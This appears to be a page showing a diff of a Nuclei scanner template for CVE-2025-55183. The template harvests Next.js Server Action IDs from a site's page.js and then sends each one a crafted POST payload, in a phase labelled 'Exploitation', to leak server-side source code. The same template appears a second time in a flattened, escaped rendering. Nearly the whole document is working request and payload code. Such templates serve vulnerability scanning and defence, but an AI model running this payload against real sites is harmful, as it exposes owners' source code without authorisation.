bolhasec · December 12, 2025 21:55
diff --git a/CVE-2025-55183.yaml b/CVE-2025-55183.yaml
 id: CVE-2025-55183

 # In my tests, using -debug flag provides better results

 info:
  name: Next.js Server Action Introspection
  author: sushicomabacate
  severity: high
  description: |
    Extracts 40 or 42-character Server Action IDs from /_next/static/chunks/app/page.js and invokes them via POST to check for source code leakage.

 # Using 'http' protocol handles variable chaining/iteration correctly in Nuclei v3
 http:
  - raw:
      # -------------------------------------------------------
      # Phase 1: Extraction
      # -------------------------------------------------------
      - |
        GET /_next/static/chunks/app/page.js HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    extractors:
      - type: regex
        name: action_id
        internal: true
        regex:
          - '([a-f0-9]{40,42})'
        group: 1

  - raw:
      # -------------------------------------------------------
      # Phase 2: Exploitation
      # Nuclei iterates this request for EVERY ID found in Phase 1
      # -------------------------------------------------------
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        next-action: {{action_id}}

        &0=["$F1"]&1={"id":"{{action_id}}","bound":null}

    matchers-condition: and
    matchers:
      # 1. Must be a successful request
      - type: status
        status:
          - 200

      # 2. Must specifically contain "function" (proof of source code leak)
      # If you want to see ALL successful executions (even non-leaks), remove this block.
      - type: word
        part: body
        words:
          - "function"

    extractors:
      # -------------------------------------------------------
      # Display Response
      # -------------------------------------------------------
      - type: regex
        name: leaked_response
        part: body
        regex:
          - "([\\s\\S]+)" # Captures full response body
	id: CVE-2025-55183

	# In my tests, using -debug flag provides better results

	info:
	name: Next.js Server Action Introspection
	author: sushicomabacate
	severity: high
	description: \|
	Extracts 40 or 42-character Server Action IDs from /_next/static/chunks/app/page.js and invokes them via POST to check for source code leakage.

	# Using 'http' protocol handles variable chaining/iteration correctly in Nuclei v3
	http:
	- raw:
	# -------------------------------------------------------
	# Phase 1: Extraction
	# -------------------------------------------------------
	- \|
	GET /_next/static/chunks/app/page.js HTTP/1.1
	Host: {{Hostname}}
	Accept: /

	extractors:
	- type: regex
	name: action_id
	internal: true
	regex:
	- '([a-f0-9]{40,42})'
	group: 1

	- raw:
	# -------------------------------------------------------
	# Phase 2: Exploitation
	# Nuclei iterates this request for EVERY ID found in Phase 1
	# -------------------------------------------------------
	- \|
	POST / HTTP/1.1
	Host: {{Hostname}}
	Content-Type: application/x-www-form-urlencoded
	next-action: {{action_id}}

	&0=["$F1"]&1={"id":"{{action_id}}","bound":null}

	matchers-condition: and
	matchers:
	# 1. Must be a successful request
	- type: status
	status:
	- 200

	# 2. Must specifically contain "function" (proof of source code leak)
	# If you want to see ALL successful executions (even non-leaks), remove this block.
	- type: word
	part: body
	words:
	- "function"

	extractors:
	# -------------------------------------------------------
	# Display Response
	# -------------------------------------------------------
	- type: regex
	name: leaked_response
	part: body
	regex:
	- "([\\s\\S]+)" # Captures full response body
No results found